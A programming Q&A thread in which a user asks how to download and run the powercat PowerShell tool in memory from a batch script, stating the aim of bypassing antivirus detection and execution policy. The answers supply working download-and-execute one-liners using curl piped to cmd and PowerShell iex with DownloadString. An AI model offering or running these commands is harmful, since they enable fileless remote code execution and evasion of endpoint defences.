8

In my batch script, I am trying to download and execute a powershell script remotely. Here is the url:

https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

I want to download the file into memory (without touching disk), for several reasons:

  1. It bypasses AV detection
  2. It bypasses Powershell executionpolicy, so there's no need for the powershell -nop -ep bypass that causes AV detection
  3. Won't throw unneccessary syntax errors
  4. You can directly use functions defined inside the .ps1 script

Obviously i can use certutil:

certutil -urlcache -split -f <url>

but I don't want the file to hit disk, which can cause AV detection.
The same thing can be done with easily using other languages, like PowerShell:

(New-Object Net.WebClient).DownloadString($url)

OR

(New-Object IO.StreamReader([Net.HttpWebRequest]::Create($url).GetResponse().GetResponseStream())).ReadToEnd()

I know batch isn't the best language to do this, but is it possible? (I want pure batch)

ScriptKidd
  • 803
  • 1
  • 5
  • 19
  • Does this answer your question? [Is it possible to run an .exe or .bat file on 'onclick' in HTML](https://stackoverflow.com/questions/18980957/is-it-possible-to-run-an-exe-or-bat-file-on-onclick-in-html) – Owain Esau Feb 19 '20 at 04:03
  • That isn't what i meant. – ScriptKidd Feb 19 '20 at 04:25
  • 2
    Read the answer [here](https://stackoverflow.com/questions/37933555/force-batch-file-to-load-to-ram-before-running) by @Jeb. Also follow the link to DBenham's [post](https://stackoverflow.com/questions/20329355/how-to-make-a-batch-file-delete-itself/20333575#20333575) – Gerhard Feb 19 '20 at 06:16
  • 1
    @OwainEsau please enlighten me with how exactly that link has to do with loading downloading into memory? – Gerhard Feb 19 '20 at 06:19

3 Answers3

2

Download and execute without a temporary file

curl -s https://example.com/test.bat | cmd /v:on /k

Example test.bat

@echo off
(
cls

echo Hello
echo Time: !time!
exit
)

Building the code

As said in Force batch file to load to RAM before running you can cache a single command block.

There are some limitations:

  • It's running in cmd (not batch) context, variable expansion is a bit different.
  • Labels can't be used

With this technique you can use the normal batch macro style.

jeb
  • 78,592
  • 17
  • 171
  • 225
2

I know you want pure batch, but seriously though, even with Restricted execution policy of powershell, it permits individual commands. See https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7

So its as simple as

powershell -command iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
loadingnow
  • 597
  • 3
  • 20
  • i already know how to use `DownloadString`, but thank you for pointing out it's pointless to not use powershell. – ScriptKidd Mar 25 '20 at 10:19
  • 1
    @HackingAddict1337 But if you are running a powershell script, you still would have to run the powershell program anyway, so why not? – loadingnow Mar 26 '20 at 12:29
-2

To my knowledge, no. Batch reads a file by accessing it via read perms. This means that it would not use the right protocol to access a file on a web server without batch allowing it to be read via FTP.

Bhargav Rao
  • 50,140
  • 28
  • 121
  • 140
coffee
  • 159
  • 1
  • 5
  • 1
    What I want do is send a http request to the site via a batch file to copy the content of the remote file. It (should?) have nothing to do with read perms. Also, i'm using `http` not ftp. – ScriptKidd Feb 19 '20 at 09:43